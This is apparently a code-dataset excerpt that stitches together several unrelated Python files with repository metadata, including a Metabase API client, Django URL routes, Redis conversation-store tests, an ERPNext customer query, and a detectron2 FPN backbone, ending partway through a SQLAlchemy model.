self, database_id: str, schema: str, schemas_to_exclude: Iterable = None
) -> Tuple[dict, dict]:
if schemas_to_exclude is None:
schemas_to_exclude = []
table_lookup = {}
field_lookup = {}
metadata = self.api(
"get",
f"/api/database/{database_id}/metadata",
params=dict(include_hidden=True),
)
for table in metadata.get("tables", []):
table_schema = table.get("schema", "public").upper()
table_name = table["name"].upper()
if schema:
if table_schema != schema.upper():
logging.debug(
"Ignoring Metabase table %s in schema %s. It does not belong to selected schema %s",
table_name,
table_schema,
schema,
)
continue
if schemas_to_exclude:
schemas_to_exclude = {
exclusion.upper() for exclusion in schemas_to_exclude
}
if table_schema in schemas_to_exclude:
logging.debug(
"Ignoring Metabase table %s in schema %s. It belongs to excluded schemas %s",
table_name,
table_schema,
schemas_to_exclude,
)
continue
lookup_key = f"{table_schema}.{table_name}"
table_lookup[lookup_key] = table
table_field_lookup = {}
for field in table.get("fields", []):
field_name = field["name"].upper()
table_field_lookup[field_name] = field
field_lookup[lookup_key] = table_field_lookup
return table_lookup, field_lookup
def api(
self,
method: str,
path: str,
authenticated: bool = True,
critical: bool = True,
**kwargs,
) -> Any:
headers: MutableMapping = {}
if "headers" not in kwargs:
kwargs["headers"] = headers
else:
headers = kwargs["headers"].copy()
if authenticated:
headers["X-Metabase-Session"] = self.session_id
response = requests.request(
method, f"{self.protocol}://{self.host}{path}", verify=self.verify, **kwargs
)
if critical:
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
if "password" in kwargs["json"]:
logging.error("HTTP request failed. Response: %s", response.text)
else:
logging.error(
"HTTP request failed. Payload: %s. Response: %s",
kwargs["json"],
response.text,
)
raise
elif not response.ok:
return False
response_json = json.loads(response.text)
if "data" in response_json:
return response_json["data"]
return response_json
| true | true |
1c33255da650a6e219e2d8259c06989b5ad06956 | 2,091 | py | Python | hknweb/urls.py | yousefh409/hknweb | d791e9f009d216a6e61f5a62a71077ff1098d9e7 | [
"MIT"
] | 1 | 2021-11-03T04:42:09.000Z | 2021-11-03T04:42:09.000Z | hknweb/urls.py | yousefh409/hknweb | d791e9f009d216a6e61f5a62a71077ff1098d9e7 | [
"MIT"
] | null | null | null | hknweb/urls.py | yousefh409/hknweb | d791e9f009d216a6e61f5a62a71077ff1098d9e7 | [
"MIT"
] | null | null | null | """hknweb URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from .shortlinks import views as viewsShortlink
from .views import landing
from .views import users
urlpatterns = [
path("admin/", admin.site.urls),
path('polls/', include('hknweb.polls.urls')),
path("accounts/", include("django.contrib.auth.urls")),
path("accounts/create/", users.account_create, name="account-create"),
path("accounts/settings/", users.account_settings, name="account-settings"),
path("accounts/activate/", users.activate),
path("about/", landing.about, name="about"),
path("events/", include("hknweb.events.urls")),
path("reviewsessions/", include("hknweb.reviewsessions.urls")),
path("exams/", include("hknweb.exams.urls")),
path("alumni/", include("hknweb.alumni.urls")),
path("tutoring/", include("hknweb.tutoring.urls")),
path("cand/", include("hknweb.candidate.urls")),
path("pages/", include("hknweb.markdown_pages.urls")),
path("markdownx/", include("markdownx.urls")),
path("elections/", include("hknweb.elections.urls")),
path("auth/", include("social_django.urls", namespace="social")),
path("", landing.home, name="home"),
path("<slug:temp>/", viewsShortlink.openLink),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 41.82 | 80 | 0.702056 | from django.contrib import admin
from django.urls import include
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from .shortlinks import views as viewsShortlink
from .views import landing
from .views import users
urlpatterns = [
path("admin/", admin.site.urls),
path('polls/', include('hknweb.polls.urls')),
path("accounts/", include("django.contrib.auth.urls")),
path("accounts/create/", users.account_create, name="account-create"),
path("accounts/settings/", users.account_settings, name="account-settings"),
path("accounts/activate/", users.activate),
path("about/", landing.about, name="about"),
path("events/", include("hknweb.events.urls")),
path("reviewsessions/", include("hknweb.reviewsessions.urls")),
path("exams/", include("hknweb.exams.urls")),
path("alumni/", include("hknweb.alumni.urls")),
path("tutoring/", include("hknweb.tutoring.urls")),
path("cand/", include("hknweb.candidate.urls")),
path("pages/", include("hknweb.markdown_pages.urls")),
path("markdownx/", include("markdownx.urls")),
path("elections/", include("hknweb.elections.urls")),
path("auth/", include("social_django.urls", namespace="social")),
path("", landing.home, name="home"),
path("<slug:temp>/", viewsShortlink.openLink),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| true | true |
1c332573b838a8eb88b2d6b5b813b8b4fa3e8fc9 | 342 | py | Python | autotest/tests/login/conftest.py | BillionsRichard/pycharmWorkspace | 709e2681fc6d85ff52fb25717215a365f51073aa | [
"Apache-2.0"
] | null | null | null | autotest/tests/login/conftest.py | BillionsRichard/pycharmWorkspace | 709e2681fc6d85ff52fb25717215a365f51073aa | [
"Apache-2.0"
] | null | null | null | autotest/tests/login/conftest.py | BillionsRichard/pycharmWorkspace | 709e2681fc6d85ff52fb25717215a365f51073aa | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: billions.richard@qq.com
@site:https://github.com/BillionsRichard
@software: PyCharm
@time: 2020/11/1 10:53
"""
import pytest
@pytest.fixture(scope="package", autouse=True)
def st_login():
print("初始化---login")
yield
print("清除---login")
| 14.869565 | 46 | 0.684211 |
import pytest
@pytest.fixture(scope="package", autouse=True)
def st_login():
print("初始化---login")
yield
print("清除---login")
| true | true |
1c3325c5abfa60aab2337e73ceec6e344c0c323f | 3,960 | py | Python | test/programytest/storage/stores/nosql/redis/store/test_conversations.py | cdoebler1/AIML2 | ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | test/programytest/storage/stores/nosql/redis/store/test_conversations.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | test/programytest/storage/stores/nosql/redis/store/test_conversations.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | import unittest
import programytest.storage.engines as Engines
from programy.dialog.conversation import Conversation
from programy.dialog.question import Question
from programy.storage.stores.nosql.redis.config import RedisStorageConfiguration
from programy.storage.stores.nosql.redis.engine import RedisStorageEngine
from programy.storage.stores.nosql.redis.store.conversations import RedisConversationStore
from programytest.client import TestClient
class MockRedisConversationStore(RedisConversationStore):
def __init__(self, storage_engine, fail_write=False, fail_read=False):
RedisConversationStore.__init__(self, storage_engine)
self._fail_write = fail_write
self._fail_read = fail_read
def _write_conversation(self, client_context, conversation):
if self._fail_write is True:
raise Exception("Mock exception")
super(MockRedisConversationStore)._write_conversation(client_context, conversation)
def _read_conversation(self, client_context, conversation):
if self._fail_read is True:
raise Exception("Mock exception")
super(MockRedisConversationStore)._read_conversation(client_context, conversation)
class RedisConversationStoreTests(unittest.TestCase):
@unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
def test_initialise(self):
config = RedisStorageConfiguration()
engine = RedisStorageEngine(config)
engine.initialise()
store = RedisConversationStore(engine)
self.assertEqual(store.storage_engine, engine)
@unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
def test_conversations_storage(self):
config = RedisStorageConfiguration()
engine = RedisStorageEngine(config)
engine.initialise()
store = RedisConversationStore(engine)
client = TestClient()
client_context = client.create_client_context("user1")
conversation1 = Conversation(client_context)
conversation1.properties['ckey1'] = "cvalue1"
conversation1.properties['ckey2'] ="cvalue2"
question1 = Question.create_from_text(client_context, "Hello There")
question1.sentence(0).response = "Hi"
question1.sentence(0)._positivity = 0.5
question1.sentence(0)._subjectivity = 0.6
question1.properties['qkey1'] = "qvalue1"
question1.properties['qkey2'] = "qvalue2"
conversation1.record_dialog(question1)
store.store_conversation(client_context, conversation1)
conversation2 = Conversation(client_context)
store.load_conversation(client_context, conversation2)
self.assertIsNotNone(conversation2)
self.assertEqual(conversation2.properties['ckey1'], "cvalue1")
self.assertEqual(conversation2.properties['ckey2'], "cvalue2")
self.assertEqual(conversation2.questions[0].sentence(0).response, "Hi")
self.assertEqual(conversation2.questions[0].sentence(0)._positivity, 0.5)
self.assertEqual(conversation2.questions[0].sentence(0)._subjectivity, 0.6)
self.assertEqual(conversation2.questions[0].properties['qkey1'], "qvalue1")
self.assertEqual(conversation2.questions[0].properties['qkey2'], "qvalue2")
store.empty()
@unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
def test_conversations_storage_exception_on_save_load(self):
config = RedisStorageConfiguration()
engine = RedisStorageEngine(config)
engine.initialise()
store = MockRedisConversationStore(engine, fail_write=False, fail_read=False)
client = TestClient()
client_context = client.create_client_context("user1")
conversation1 = Conversation(client_context)
store.store_conversation(client_context, conversation1)
conversation2 = Conversation(client_context)
store.load_conversation(client_context, conversation2)
| 39.6 | 91 | 0.736869 | import unittest
import programytest.storage.engines as Engines
from programy.dialog.conversation import Conversation
from programy.dialog.question import Question
from programy.storage.stores.nosql.redis.config import RedisStorageConfiguration
from programy.storage.stores.nosql.redis.engine import RedisStorageEngine
from programy.storage.stores.nosql.redis.store.conversations import RedisConversationStore
from programytest.client import TestClient
class MockRedisConversationStore(RedisConversationStore):
def __init__(self, storage_engine, fail_write=False, fail_read=False):
RedisConversationStore.__init__(self, storage_engine)
self._fail_write = fail_write
self._fail_read = fail_read
def _write_conversation(self, client_context, conversation):
if self._fail_write is True:
raise Exception("Mock exception")
super(MockRedisConversationStore)._write_conversation(client_context, conversation)
def _read_conversation(self, client_context, conversation):
if self._fail_read is True:
raise Exception("Mock exception")
super(MockRedisConversationStore)._read_conversation(client_context, conversation)
class RedisConversationStoreTests(unittest.TestCase):
@unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
def test_initialise(self):
config = RedisStorageConfiguration()
engine = RedisStorageEngine(config)
engine.initialise()
store = RedisConversationStore(engine)
self.assertEqual(store.storage_engine, engine)
@unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
def test_conversations_storage(self):
config = RedisStorageConfiguration()
engine = RedisStorageEngine(config)
engine.initialise()
store = RedisConversationStore(engine)
client = TestClient()
client_context = client.create_client_context("user1")
conversation1 = Conversation(client_context)
conversation1.properties['ckey1'] = "cvalue1"
conversation1.properties['ckey2'] ="cvalue2"
question1 = Question.create_from_text(client_context, "Hello There")
question1.sentence(0).response = "Hi"
question1.sentence(0)._positivity = 0.5
question1.sentence(0)._subjectivity = 0.6
question1.properties['qkey1'] = "qvalue1"
question1.properties['qkey2'] = "qvalue2"
conversation1.record_dialog(question1)
store.store_conversation(client_context, conversation1)
conversation2 = Conversation(client_context)
store.load_conversation(client_context, conversation2)
self.assertIsNotNone(conversation2)
self.assertEqual(conversation2.properties['ckey1'], "cvalue1")
self.assertEqual(conversation2.properties['ckey2'], "cvalue2")
self.assertEqual(conversation2.questions[0].sentence(0).response, "Hi")
self.assertEqual(conversation2.questions[0].sentence(0)._positivity, 0.5)
self.assertEqual(conversation2.questions[0].sentence(0)._subjectivity, 0.6)
self.assertEqual(conversation2.questions[0].properties['qkey1'], "qvalue1")
self.assertEqual(conversation2.questions[0].properties['qkey2'], "qvalue2")
store.empty()
@unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
def test_conversations_storage_exception_on_save_load(self):
config = RedisStorageConfiguration()
engine = RedisStorageEngine(config)
engine.initialise()
store = MockRedisConversationStore(engine, fail_write=False, fail_read=False)
client = TestClient()
client_context = client.create_client_context("user1")
conversation1 = Conversation(client_context)
store.store_conversation(client_context, conversation1)
conversation2 = Conversation(client_context)
store.load_conversation(client_context, conversation2)
| true | true |
1c3326aed05c037d41918d057a1a93994e862c35 | 1,971 | py | Python | consoleerp_erpnext_client/api/custom_link_queries.py | consoleerp/consoleerp_erpnext_client | 44bc79f45e87c750e739d4cc82a42ecd7b94eb60 | [
"MIT"
] | 3 | 2017-04-02T11:44:01.000Z | 2018-05-04T20:46:19.000Z | consoleerp_erpnext_client/api/custom_link_queries.py | consoleerp/consoleerp_erpnext_client | 44bc79f45e87c750e739d4cc82a42ecd7b94eb60 | [
"MIT"
] | 7 | 2017-03-25T08:31:34.000Z | 2017-05-18T09:48:50.000Z | consoleerp_erpnext_client/api/custom_link_queries.py | consoleerp/consoleerp_erpnext_client | 44bc79f45e87c750e739d4cc82a42ecd7b94eb60 | [
"MIT"
] | 4 | 2017-04-02T11:44:02.000Z | 2019-08-29T17:08:49.000Z | from __future__ import unicode_literals
import frappe
from frappe.desk.reportview import get_match_cond
from frappe.model.db_query import DatabaseQuery
from frappe.utils import nowdate
def customer_query(doctype, txt, searchfield, start, page_len, filters):
conditions = []
cust_master_name = frappe.defaults.get_user_default("cust_master_name")
if cust_master_name == "Customer Name":
fields = ["name", "customer_group", "territory"]
else:
fields = ["name", "customer_name", "customer_group", "territory"]
meta = frappe.get_meta("Customer")
fields = fields + [f for f in meta.get_search_fields() if not f in fields]
fields = ", ".join(fields)
return frappe.db.sql("""select {fields} from `tabCustomer`
where docstatus < 2
and ({key} like %(txt)s
or customer_name like %(txt)s) and disabled=0
{fcond} {mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, customer_name), locate(%(_txt)s, customer_name), 99999),
idx desc,
name, customer_name
limit %(start)s, %(page_len)s""".format(**{
"fields": fields,
"key": searchfield,
"fcond" : get_filters_cond(doctype, filters, conditions),
"mcond": get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
def get_filters_cond(doctype, filters, conditions):
if filters:
flt = filters
if isinstance(filters, dict):
filters = filters.items()
flt = []
for f in filters:
if isinstance(f[1], basestring) and f[1][0] == '!':
flt.append([doctype, f[0], '!=', f[1][1:]])
else:
value = frappe.db.escape(f[1]) if isinstance(f[1], basestring) else f[1]
flt.append([doctype, f[0], '=', value])
query = DatabaseQuery(doctype)
query.filters = flt
query.conditions = conditions
query.build_filter_conditions(flt, conditions)
cond = ' and ' + ' and '.join(query.conditions)
else:
cond = ''
return cond | 29.41791 | 79 | 0.666667 | from __future__ import unicode_literals
import frappe
from frappe.desk.reportview import get_match_cond
from frappe.model.db_query import DatabaseQuery
from frappe.utils import nowdate
def customer_query(doctype, txt, searchfield, start, page_len, filters):
conditions = []
cust_master_name = frappe.defaults.get_user_default("cust_master_name")
if cust_master_name == "Customer Name":
fields = ["name", "customer_group", "territory"]
else:
fields = ["name", "customer_name", "customer_group", "territory"]
meta = frappe.get_meta("Customer")
fields = fields + [f for f in meta.get_search_fields() if not f in fields]
fields = ", ".join(fields)
return frappe.db.sql("""select {fields} from `tabCustomer`
where docstatus < 2
and ({key} like %(txt)s
or customer_name like %(txt)s) and disabled=0
{fcond} {mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, customer_name), locate(%(_txt)s, customer_name), 99999),
idx desc,
name, customer_name
limit %(start)s, %(page_len)s""".format(**{
"fields": fields,
"key": searchfield,
"fcond" : get_filters_cond(doctype, filters, conditions),
"mcond": get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
def get_filters_cond(doctype, filters, conditions):
if filters:
flt = filters
if isinstance(filters, dict):
filters = filters.items()
flt = []
for f in filters:
if isinstance(f[1], basestring) and f[1][0] == '!':
flt.append([doctype, f[0], '!=', f[1][1:]])
else:
value = frappe.db.escape(f[1]) if isinstance(f[1], basestring) else f[1]
flt.append([doctype, f[0], '=', value])
query = DatabaseQuery(doctype)
query.filters = flt
query.conditions = conditions
query.build_filter_conditions(flt, conditions)
cond = ' and ' + ' and '.join(query.conditions)
else:
cond = ''
return cond | true | true |
1c33272368020e92f0b9071c611e84c90714f5f1 | 976 | py | Python | MAQTextSDK/models/data_input_data_item_py3.py | maqsoftware/TextAnalyticsSDK | 545533d79db2f23e395495e9968c121ea3474ae4 | [
"MIT"
] | null | null | null | MAQTextSDK/models/data_input_data_item_py3.py | maqsoftware/TextAnalyticsSDK | 545533d79db2f23e395495e9968c121ea3474ae4 | [
"MIT"
] | null | null | null | MAQTextSDK/models/data_input_data_item_py3.py | maqsoftware/TextAnalyticsSDK | 545533d79db2f23e395495e9968c121ea3474ae4 | [
"MIT"
] | 6 | 2020-11-19T07:09:54.000Z | 2021-12-06T10:40:14.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DataInputDataItem(Model):
"""DataInputDataItem.
All required parameters must be populated in order to send to Azure.
:param id: Required.
:type id: str
:param text: Required.
:type text: str
"""
_validation = {
"id": {"required": True},
"text": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"text": {"key": "text", "type": "str"},
}
def __init__(self, *, id: str, text: str, **kwargs) -> None:
super(DataInputDataItem, self).__init__(**kwargs)
self.id = id
self.text = text
| 27.111111 | 76 | 0.505123 |
from msrest.serialization import Model
class DataInputDataItem(Model):
_validation = {
"id": {"required": True},
"text": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"text": {"key": "text", "type": "str"},
}
def __init__(self, *, id: str, text: str, **kwargs) -> None:
super(DataInputDataItem, self).__init__(**kwargs)
self.id = id
self.text = text
| true | true |
1c3327f3a2fa39f13359dcded445dadbcae279bc | 8,736 | py | Python | detectron/modeling/backbone/ftt_fpn.py | guowenhao787938711/EFPN-detectron2 | 58caabcf5edd5615f17d844618cf42367e567ee3 | [
"Apache-2.0"
] | 1 | 2021-07-16T06:05:56.000Z | 2021-07-16T06:05:56.000Z | detectron2/modeling/backbone/ftt_fpn.py | Kg6815311/pipe_EFPN_detectron2 | 1a381027cc19845afb88461bd5c96fa0fd75f449 | [
"Apache-2.0"
] | null | null | null | detectron2/modeling/backbone/ftt_fpn.py | Kg6815311/pipe_EFPN_detectron2 | 1a381027cc19845afb88461bd5c96fa0fd75f449 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
import math
import fvcore.nn.weight_init as weight_init
import torch.nn.functional as F
from torch import nn
from detectron2.layers import Conv2d, ShapeSpec, get_norm
from .backbone import Backbone
from .build import BACKBONE_REGISTRY
from .resnet import build_resnet_backbone
from .ftt import FTT
__all__ = ["build_resnet_fpn_backbone",
#"build_retinanet_resnet_fpn_backbone",
"FPN"]
class FPN(Backbone):
"""
This module implements :paper:`FPN`.
It creates pyramid features built on top of some input feature maps.
"""
def __init__(
self, bottom_up, in_features, out_channels, norm="", top_block=None, fuse_type="sum"
):
"""
Args:
bottom_up (Backbone): module representing the bottom up subnetwork.
Must be a subclass of :class:`Backbone`. The multi-scale feature
maps generated by the bottom up network, and listed in `in_features`,
are used to generate FPN levels.
in_features (list[str]): names of the input feature maps coming
from the backbone to which FPN is attached. For example, if the
backbone produces ["res2", "res3", "res4"], any *contiguous* sublist
of these may be used; order must be from high to low resolution.
out_channels (int): number of channels in the output feature maps.
norm (str): the normalization to use.
top_block (nn.Module or None): if provided, an extra operation will
be performed on the output of the last (smallest resolution)
FPN output, and the result will extend the result list. The top_block
further downsamples the feature map. It must have an attribute
"num_levels", meaning the number of extra FPN levels added by
this block, and "in_feature", which is a string representing
its input feature (e.g., p5).
fuse_type (str): types for fusing the top down features and the lateral
ones. It can be "sum" (default), which sums up element-wise; or "avg",
which takes the element-wise mean of the two.
"""
super(FPN, self).__init__()
assert isinstance(bottom_up, Backbone)
assert in_features, in_features
# Feature map strides and channels from the bottom up network (e.g. ResNet)
input_shapes = bottom_up.output_shape()
strides = [input_shapes[f].stride for f in in_features]
in_channels_per_feature = [input_shapes[f].channels for f in in_features]
_assert_strides_are_log2_contiguous(strides)
lateral_convs = []
output_convs = []
use_bias = norm == ""
for idx, in_channels in enumerate(in_channels_per_feature):
# doesn't fix checkpoint dimension problem :(
# if idx > len(in_channels_per_feature) - 3:
# in_channels //= 2
lateral_norm = get_norm(norm, out_channels)
output_norm = get_norm(norm, out_channels)
lateral_conv = Conv2d(
in_channels, out_channels, kernel_size=1, bias=use_bias, norm=lateral_norm
)
output_conv = Conv2d(
out_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=use_bias,
norm=output_norm,
)
weight_init.c2_xavier_fill(lateral_conv)
weight_init.c2_xavier_fill(output_conv)
stage = int(math.log2(strides[idx]))
self.add_module("fpn_lateral{}".format(stage), lateral_conv)
self.add_module("fpn_output{}".format(stage), output_conv)
lateral_convs.append(lateral_conv)
output_convs.append(output_conv)
# Place convs into top-down order (from low to high resolution)
# to make the top-down computation in forward clearer.
self.lateral_convs = lateral_convs[::-1]
self.output_convs = output_convs[::-1]
self.top_block = top_block
self.in_features = in_features
self.bottom_up = bottom_up
# Return feature names are "p<stage>", like ["p2", "p3", ..., "p6"]
self._out_feature_strides = {"p{}".format(int(math.log2(s))): s for s in strides}
# top block output feature maps.
if self.top_block is not None:
for s in range(stage, stage + self.top_block.num_levels):
self._out_feature_strides["p{}".format(s + 1)] = 2 ** (s + 1)
self._out_features = list(self._out_feature_strides.keys())
self._out_feature_channels = {k: out_channels for k in self._out_features}
self.ftt = FTT(self, ['p2', 'p3'], out_channels)
self._size_divisibility = strides[-1]
assert fuse_type in {"avg", "sum"}
self._fuse_type = fuse_type
@property
def size_divisibility(self):
return self._size_divisibility
def forward(self, x):
"""
Args:
input (dict[str->Tensor]): mapping feature map name (e.g., "res5") to
feature map tensor for each feature level in high to low resolution order.
Returns:
dict[str->Tensor]:
mapping from feature map name to FPN feature map tensor
in high to low resolution order. Returned feature names follow the FPN
paper convention: "p<stage>", where stage has stride = 2 ** stage e.g.,
["p2", "p3", ..., "p6"].
"""
# Reverse feature maps into top-down order (from low to high resolution)
bottom_up_features = self.bottom_up(x)
x = [bottom_up_features[f] for f in self.in_features[::-1]]
results = []
prev_features = self.lateral_convs[0](x[0])
results.append(self.output_convs[0](prev_features))
for features, lateral_conv, output_conv in zip(
x[1:], self.lateral_convs[1:], self.output_convs[1:]
):
top_down_features = F.interpolate(prev_features, scale_factor=2, mode="nearest")
lateral_features = lateral_conv(features)
prev_features = lateral_features + top_down_features
if self._fuse_type == "avg":
prev_features /= 2
results.insert(0, output_conv(prev_features))
if self.top_block is not None:
top_block_in_feature = bottom_up_features.get(self.top_block.in_feature, None)
if top_block_in_feature is None:
top_block_in_feature = results[self._out_features.index(self.top_block.in_feature)]
results.extend(self.top_block(top_block_in_feature))
assert len(self._out_features) == len(results)
ret = dict(zip(self._out_features, results))
print("\nret1: ")
print(ret, '\n', '-----------', '\n\n')
ret['p3\''] = self.ftt.forward(ret)
print("\nret2: ")
print(ret,'---\n')
return ret
def output_shape(self):
return {
name: ShapeSpec(
channels=self._out_feature_channels[name], stride=self._out_feature_strides[name]
)
for name in self._out_features
}
def _assert_strides_are_log2_contiguous(strides):
"""
Assert that each stride is 2x times its preceding stride, i.e. "contiguous in log2".
"""
for i, stride in enumerate(strides[1:], 1):
assert stride == 2 * strides[i - 1], "Strides {} {} are not log2 contiguous".format(
stride, strides[i - 1]
)
class LastLevelMaxPool(nn.Module):
"""
This module is used in the original FPN to generate a downsampled
P6 feature from P5.
"""
def __init__(self):
super().__init__()
self.num_levels = 1
self.in_feature = "p6" # originally p5
def forward(self, x):
return [F.max_pool2d(x, kernel_size=1, stride=2, padding=0)]
@BACKBONE_REGISTRY.register()
def build_resnet_fpn_backbone(cfg, input_shape: ShapeSpec):
"""
Args:
cfg: a detectron2 CfgNode
Returns:
backbone (Backbone): backbone module, must be a subclass of :class:`Backbone`.
"""
bottom_up = build_resnet_backbone(cfg, input_shape)
in_features = cfg.MODEL.FPN.IN_FEATURES
out_channels = cfg.MODEL.FPN.OUT_CHANNELS
backbone = FPN(
bottom_up=bottom_up,
in_features=in_features,
out_channels=out_channels,
norm=cfg.MODEL.FPN.NORM,
top_block=LastLevelMaxPool(),
fuse_type=cfg.MODEL.FPN.FUSE_TYPE,
)
return backbone
| 39.529412 | 99 | 0.616529 |
import math
import fvcore.nn.weight_init as weight_init
import torch.nn.functional as F
from torch import nn
from detectron2.layers import Conv2d, ShapeSpec, get_norm
from .backbone import Backbone
from .build import BACKBONE_REGISTRY
from .resnet import build_resnet_backbone
from .ftt import FTT
__all__ = ["build_resnet_fpn_backbone",
"FPN"]
class FPN(Backbone):
def __init__(
self, bottom_up, in_features, out_channels, norm="", top_block=None, fuse_type="sum"
):
super(FPN, self).__init__()
assert isinstance(bottom_up, Backbone)
assert in_features, in_features
input_shapes = bottom_up.output_shape()
strides = [input_shapes[f].stride for f in in_features]
in_channels_per_feature = [input_shapes[f].channels for f in in_features]
_assert_strides_are_log2_contiguous(strides)
lateral_convs = []
output_convs = []
use_bias = norm == ""
for idx, in_channels in enumerate(in_channels_per_feature):
# if idx > len(in_channels_per_feature) - 3:
# in_channels //= 2
lateral_norm = get_norm(norm, out_channels)
output_norm = get_norm(norm, out_channels)
lateral_conv = Conv2d(
in_channels, out_channels, kernel_size=1, bias=use_bias, norm=lateral_norm
)
output_conv = Conv2d(
out_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=use_bias,
norm=output_norm,
)
weight_init.c2_xavier_fill(lateral_conv)
weight_init.c2_xavier_fill(output_conv)
stage = int(math.log2(strides[idx]))
self.add_module("fpn_lateral{}".format(stage), lateral_conv)
self.add_module("fpn_output{}".format(stage), output_conv)
lateral_convs.append(lateral_conv)
output_convs.append(output_conv)
# Place convs into top-down order (from low to high resolution)
# to make the top-down computation in forward clearer.
self.lateral_convs = lateral_convs[::-1]
self.output_convs = output_convs[::-1]
self.top_block = top_block
self.in_features = in_features
self.bottom_up = bottom_up
# Return feature names are "p<stage>", like ["p2", "p3", ..., "p6"]
self._out_feature_strides = {"p{}".format(int(math.log2(s))): s for s in strides}
# top block output feature maps.
if self.top_block is not None:
for s in range(stage, stage + self.top_block.num_levels):
self._out_feature_strides["p{}".format(s + 1)] = 2 ** (s + 1)
self._out_features = list(self._out_feature_strides.keys())
self._out_feature_channels = {k: out_channels for k in self._out_features}
self.ftt = FTT(self, ['p2', 'p3'], out_channels)
self._size_divisibility = strides[-1]
assert fuse_type in {"avg", "sum"}
self._fuse_type = fuse_type
@property
def size_divisibility(self):
return self._size_divisibility
def forward(self, x):
# Reverse feature maps into top-down order (from low to high resolution)
bottom_up_features = self.bottom_up(x)
x = [bottom_up_features[f] for f in self.in_features[::-1]]
results = []
prev_features = self.lateral_convs[0](x[0])
results.append(self.output_convs[0](prev_features))
for features, lateral_conv, output_conv in zip(
x[1:], self.lateral_convs[1:], self.output_convs[1:]
):
top_down_features = F.interpolate(prev_features, scale_factor=2, mode="nearest")
lateral_features = lateral_conv(features)
prev_features = lateral_features + top_down_features
if self._fuse_type == "avg":
prev_features /= 2
results.insert(0, output_conv(prev_features))
if self.top_block is not None:
top_block_in_feature = bottom_up_features.get(self.top_block.in_feature, None)
if top_block_in_feature is None:
top_block_in_feature = results[self._out_features.index(self.top_block.in_feature)]
results.extend(self.top_block(top_block_in_feature))
assert len(self._out_features) == len(results)
ret = dict(zip(self._out_features, results))
print("\nret1: ")
print(ret, '\n', '-----------', '\n\n')
ret['p3\''] = self.ftt.forward(ret)
print("\nret2: ")
print(ret,'---\n')
return ret
def output_shape(self):
return {
name: ShapeSpec(
channels=self._out_feature_channels[name], stride=self._out_feature_strides[name]
)
for name in self._out_features
}
def _assert_strides_are_log2_contiguous(strides):
for i, stride in enumerate(strides[1:], 1):
assert stride == 2 * strides[i - 1], "Strides {} {} are not log2 contiguous".format(
stride, strides[i - 1]
)
class LastLevelMaxPool(nn.Module):
def __init__(self):
super().__init__()
self.num_levels = 1
self.in_feature = "p6"
def forward(self, x):
return [F.max_pool2d(x, kernel_size=1, stride=2, padding=0)]
@BACKBONE_REGISTRY.register()
def build_resnet_fpn_backbone(cfg, input_shape: ShapeSpec):
bottom_up = build_resnet_backbone(cfg, input_shape)
in_features = cfg.MODEL.FPN.IN_FEATURES
out_channels = cfg.MODEL.FPN.OUT_CHANNELS
backbone = FPN(
bottom_up=bottom_up,
in_features=in_features,
out_channels=out_channels,
norm=cfg.MODEL.FPN.NORM,
top_block=LastLevelMaxPool(),
fuse_type=cfg.MODEL.FPN.FUSE_TYPE,
)
return backbone
| true | true |
1c332877e8cbf590e4cefbf6c34341c2dc3f327f | 1,281 | py | Python | models/work_concept.py | zbj-labs/openalex-guts | 4e54363591da66b35a7376009ad1bca534559f98 | [
"MIT"
] | null | null | null | models/work_concept.py | zbj-labs/openalex-guts | 4e54363591da66b35a7376009ad1bca534559f98 | [
"MIT"
] | null | null | null | models/work_concept.py | zbj-labs/openalex-guts | 4e54363591da66b35a7376009ad1bca534559f98 | [
"MIT"
] | null | null | null | from cached_property import cached_property
from app import db
# truncate mid.work_concept
# insert into mid.work_concept (select * from legacy.mag_advanced_paper_fields_of_study)
# refresh materialized view mid.work_concept_for_api_mv
class WorkConcept(db.Model):
